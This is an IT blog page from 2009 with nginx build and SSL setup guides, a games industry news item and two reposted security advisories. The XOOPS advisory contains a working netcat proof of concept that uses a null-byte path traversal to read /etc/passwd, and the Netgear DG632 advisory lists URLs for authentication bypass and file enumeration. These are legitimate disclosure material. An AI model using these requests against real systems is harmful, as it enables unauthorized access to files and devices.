I use this on RedHat based distros (RHEL, CentOS, Fedora). This is the configuration used for running this wiki.

First, install the dependencies:

yum install gcc openssl-devel pcre-devel zlib-devel

Then run configure:

./configure \
  --prefix=/usr \
  --sbin-path=/usr/sbin/nginx \
  --conf-path=/etc/nginx/nginx.conf \
  --error-log-path=/var/log/nginx/error.log \
  --pid-path=/var/run/nginx/nginx.pid  \
  --lock-path=/var/lock/nginx.lock \
  --user=nginx \
  --group=nginx \
  --with-http_ssl_module \
  --with-http_flv_module \
  --with-http_gzip_static_module \
  --http-log-path=/var/log/nginx/access.log \
  --http-client-body-temp-path=/var/tmp/nginx/client/ \
  --http-proxy-temp-path=/var/tmp/nginx/proxy/ \
  --http-fastcgi-temp-path=/var/tmp/nginx/fcgi/

Then finally build and install:

make && make install

Tagged with: copile • nginx • options

Jun 17

iPhone game maker Ngmoco taps former Sega president

By jason IT News World 1 Comment »

Ngmoco, publisher of hit games for the iPhone and iPod touch, has named Simon Jeffrey to the post of Chief Publishing Officer for its newly created Plus+ Publishing group.

Ngmoco’s catalog of titles include games like Rolando, Star Defense, Dropship, Topple, Word Fu and more. The company has emerged as one of the leading new brands created in the wake of the launch of the App Store. Ngmoco was founded by former Electronic Arts (EA) exec Neil Young.

Jeffery previous was president and chief operating officer of Sega of America, where he oversaw publishing and product development activities. Prior to that, Jeffery was president and COO of LucasArts. All told, he has 22 years of experience in the game industry.

Plus+ Publishing is a new initiative from Ngmoco recently intimated by Young during a presentation at Apple’s Worldwide Developer Conference (WWDC). It leverages social networking capabilities that Apple has created for iPhone OS 3.0, which will be released to the public on Wednesday. More details about the new Plus+ Network are expected to emerge over the summer.

Tagged with: iphone game • president

Jun 17

XOOPS <= 2.3.3 Remote Arbitrary File Retrieval

By jason Security Bulletin No Comments »

========================================================================
              XOOPS <= 2.3.3 Remote Arbitrary File Retrieval
========================================================================
Affected Software : XOOPS <= 2.3.3
Author            : Luca "daath" De Fulgentis – daath[at]nibblesec[dot]org
Advisory number   : NS-2009-01
Advisory URL      : http://blog.nibblesec.org/advisories/NS-2009-01.txt
Severity          : Low/Medium
Local/Remote      : Remote

[Summary]
XOOPS is a web application platform written in PHP for the MySQL database.
Its object orientation makes it an ideal tool for developing small or large
community websites, intra company and corporate portals, weblogs and much
more. (Reference : http://www.xoops.org).

Nibble Security discovered a remote arbitrary file retrieval in XOOPS version
2.3.3, which could be exploited to read system or XOOPS configuration files
("mainfile.php").

[Vulnerability Details]

A vulnerable read_file() function can be found in "module_icon.php" under
/xoops_lib/modules/protector/. Here an image icon is read and its full
pathname is constructed using a user-controllable variable called
"$mydirpath" :

=============================================================================
[...]
if( file_exists( $mydirpath.’/module_icon.png’ ) ) {
      $use_custom_icon = true ;
      $icon_fullpath = $mydirpath.’/module_icon.png’ ;
} else {
      $use_custom_icon = false ;
      $icon_fullpath = dirname(__FILE__).’/module_icon.png’ ;
}

[...]
} else {

readfile( $icon_fullpath ) ;
}
?>
=============================================================================

If register_globals is enabled and magic_quotes_gpc disabled, it’s possible
to control the "$mydirpath" variable content and inject an arbitrary filename
(followed by a NULL byte (%00) to make file_exists() function ignore the
following "/module_icon.png"), resulting in file content inclusion in
application response.

[Proof of Concept Exploit]

Some browsers (e.g. Mozilla Firefox) may refuse broken images (such as the
one generated by the vulnerable script). Bacause of this netcat/telnet can be
easily used to exploit this vulnerability :

daath@shaytan:~$ echo -e "GET /xoops_lib/modules/protector/module_icon.php?
mydirpath=/etc/passwd%00 HTTP/1.0\n\n" | nc 127.0.0.1 80

HTTP/1.1 200 OK
Date: Mon, 16 Mar 2009 19:07:03 GMT
Server: Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.1 with Suhosin-Patch
X-Powered-By: PHP/5.2.6-2ubuntu4.1
Expires: Mon, 16 Mar 2009 21:00:00 +0100
Cache-Control: public, max-age=3600
Last-Modified: Mon, 16 Mar 2009 20:00:00 +0100
Content-Length: 1661
Connection: close
Content-Type: image/png

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
[...]
daath@shaytan:~$

[Time Table]

17/03/2009 – Vendor notified.
17/03/2009 – Vendor response.
28/05/2009 – Vendor re-contacted (no answer).
16/06/2009 – Public disclosure.

[Legal Notices]

The information in the advisory is believed to be accurate at the
time of publishing based on currently available information.
This information is provided as-is, as a free service to the community.
There are no warranties with regard to this information.
The author does not accept any liability for any direct,
indirect, or consequential loss or damage arising from use of,
or reliance on, this information.
Permission is hereby granted for the redistribution of this alert,
provided that the content is not altered in any way, except
reformatting, and that due credit is given.
This vulnerability has been disclosed in accordance with the RFP
Full-Disclosure Policy v2.0, available at:
http://www.wiretrip.net/rfp/policy.html

# Modules directory has an .htaccess file blocking php files from being accessed. Still the possibility is there. /str0ke

Tagged with: remote arbitrary • xoops

Jun 16

Netgear DG632 Router Authentication Bypass Vulnerability

By jason Security Bulletin 1 Comment »

Product Name: Netgear DG632 Router
Vendor: http://www.netgear.com
Date: 15 June, 2009
Author: tom@tomneaves.co.uk < tom@tomneaves.co.uk >
Original URL: http://www.tomneaves.co.uk/Netgear_DG632_Authentication_Bypass.txt
Discovered: 18 November, 2006
Disclosed: 15 June, 2009

I. DESCRIPTION

The Netgear DG632 router has a web interface which runs on port 80.
This allows an admin to login and administer the device’s settings.
Authentication of this web interface is handled by a script called
"webcm" residing in "/cgi-bin/" which redirects to the relevant pages
depending on successful user authentication. Vulnerabilities in this
interface enable an attacker to access files and data without
authentication.

II. DETAILS

The "webcm" script handles user authentication and attempts to load
"indextop.htm" (via javascript below). The "indextop.htm" page requires
authentication (HTTP Basic Authorization).

—

Loading file …
<form method="POST" action="../cgi-bin/webcm" id="uiPostForm">
<input type="hidden" name="nextpage" value="../html/indextop.htm" id="uiGetNext">
</form>

—

If a valid password to the default "admin" user is supplied, the script
then continues to load the "indextop.htm" page and continues to load the
other frames based on a hidden field. If user authentication is
unsuccessful, the user is returned back to "../cgi-bin/webcm". It is
possible to bypass the "webcm" script and access specific files directly
without the need for authentication.

Normal use:
http://TARGET_IP/cgi-bin/webcm?nextpage=../html/stattbl.htm

This would ask for the user to authenticate and would refuse access to
this file if authentication details were not known. All the script is
doing is making sure authentication is forced upon the user. The same
"stattbl.htm" file can be accessed without having to provide any
authentication using the following URL:

http://TARGET_IP/html/stattbl.htm

Another example:
http://192.168.0.1/cgi-bin/webcm?nextpage=../html/modemmenu.htm
(returns 401 – Forbidden)

Bypassing the "webcm" script:
http://192.168.0.1/html/modemmenu.htm
(returns 200 – OK)

In the example above (modemmenu.htm), the full source can be viewed
which discloses further directories and files within the javascript of
the page. A sample of files disclosed within modemmenu.htm and available
to download are:

/html/onload.htm
/html/form.css
/gateway/commands/saveconfig.html
/html/utility.js (full source)

There are many other files that are accessible by calling them directly
instead of going via the "webcm" script, the above are just a sample. In
addition, it is possible to specify paths to the "webcm" script as shown
below:

http://TARGET_IP/cgi-bin/webcm?nextpage=../../

This allows an attacker to enumerate what files and directories exist
within the www root directory and beyond by using 200, 403 and 404
errors as a guide.

Affected Versions: Firmware V3.4.0_ap (others unknown)

III. VENDOR RESPONSE

12 June, 2009 – Contacted vendor.
15 June, 2009 – Vendor responded. Stated the DG632 is an end of life
product and is no longer supported in a production and development
sense, as such, there will be no further firmware releases to resolve
this issue.

IV. CREDIT

Discovered by Tom Neaves

Tagged with: bypass • Netgear • router • vulnerability

Jun 16

How to ssl certificate installation with nginx

By jason Nginx Server No Comments »

Nginx Server SSL Certificate Installation:

Create a real SSL Certificate

1.Make sure OpenSSL is installed and in your PATH.

2.Create a RSA private key for your Apache server (will be Triple-DES encrypted and PEM formatted):
$ openssl genrsa -des3 -out server.key 1024 Please backup this server.key file and the pass-phrase you entered in a secure location. You can see the details of this RSA private key by using the command: $ openssl rsa -noout -text -in server.key
If necessary, you can also create a decrypted PEM version (not recommended) of this RSA private key with:
$ openssl rsa -in server.key -out server.key.unsecure

3.Create a Certificate Signing Request (CSR) with the server RSA private key (output will be PEM formatted):
$ openssl req -new -key server.key -out server.csr
Make sure you enter the FQDN ("Fully Qualified Domain Name") of the server when OpenSSL prompts you for the "CommonName", i.e. when you generate a CSR for a website which will be later accessed via https://www.yourdomain.dom/, enter "www.yourdomain.dom" here. You can see the details of this CSR by using
$ openssl req -noout -text -in server.csr

4.You now have to send this Certificate Signing Request (CSR) to a Certifying Authority (CA) to be signed. Once the CSR has been signed, you will have a real Certificate, which can be used by Apache. You can have a CSR signed by a commercial CA, or you can create your own CA to sign it.
Commercial CAs usually ask you to post the CSR into a web form, pay for the signing, and then send a signed Certificate, which you can store in a server.crt file. For more information about commercial CAs see the following locations:

Verisign
http://digitalid.verisign.com/server/apacheNotice.htm
Thawte
http://www.thawte.com/
CertiSign Certificadora Digital Ltda.
http://www.certisign.com.br
IKS GmbH
http://www.iks-jena.de/leistungen/ca/
Uptime Commerce Ltd.
http://www.uptimecommerce.com
BelSign NV/SA
http://www.belsign.be

For details on how to create your own CA, and use this to sign a CSR, see below.
Once your CSR has been signed, you can see the details of the Certificate as follows:
$ openssl x509 -noout -text -in yourdomain.crt

Copy the Certificate files to your server:

Copy them(server.key,yourdomain.crt), along with the .key file you generated when you created the CSR, to the directory on your server where you will keep your certificate and key files. Make them readable by root only to increase security.

Edit the Nginx virtual hosts file.

Now open your Nginx virtual host file for the website you are securing. If you need your site to be accessible through both secure (https) and non-secure (http) connections, you will need a server module for each type of connection. Make a copy of the existing non-secure server module and paste it below the original. Then add the lines in bold below:

server {

listen   443;

ssl    on;
ssl_certificate    /etc/ssl/yourdomain.crt;
ssl_certificate_key    /etc/ssl/server.key;

server_name www.yourdomain.com;
access_log /var/log/nginx/nginx.vhost.access.log;
error_log /var/log/nginx/nginx.vhost.error.log;
location / {
	root   /home/www/public_html/your.domain.com/public/;
	index  index.html;
}

}

Adjust the file names to match your certificate files:

ssl_certificate should be your primary certificate combined with the intermediate certificate that you made in the previous step (e.g. your_domain_name.crt).
ssl_certificate_key should be the key file generated when you created the CSR.

Tagged with: nginx • ssl

Previous Entries Next Entries

GO IT WORLD | IT TECH | IT NEWS

MSN revamp to include stronger Bing ties

Yahoo search engine Optimization

DESlock dlpcrypt.sys Local Kernel ring0 Code Execution Exploit

SEO Tools Collection

Microsoft veteran launches Twitter search engine

Nginx compile options

Examples

Example 1

Example 2

Example 3

Example 4

Example 5

iPhone game maker Ngmoco taps former Sega president

XOOPS <= 2.3.3 Remote Arbitrary File Retrieval

Netgear DG632 Router Authentication Bypass Vulnerability

How to ssl certificate installation with nginx

Create a real SSL Certificate

Copy the Certificate files to your server:

Edit the Nginx virtual hosts file.

Categories

Tag Cloud

Archives

Links

Meta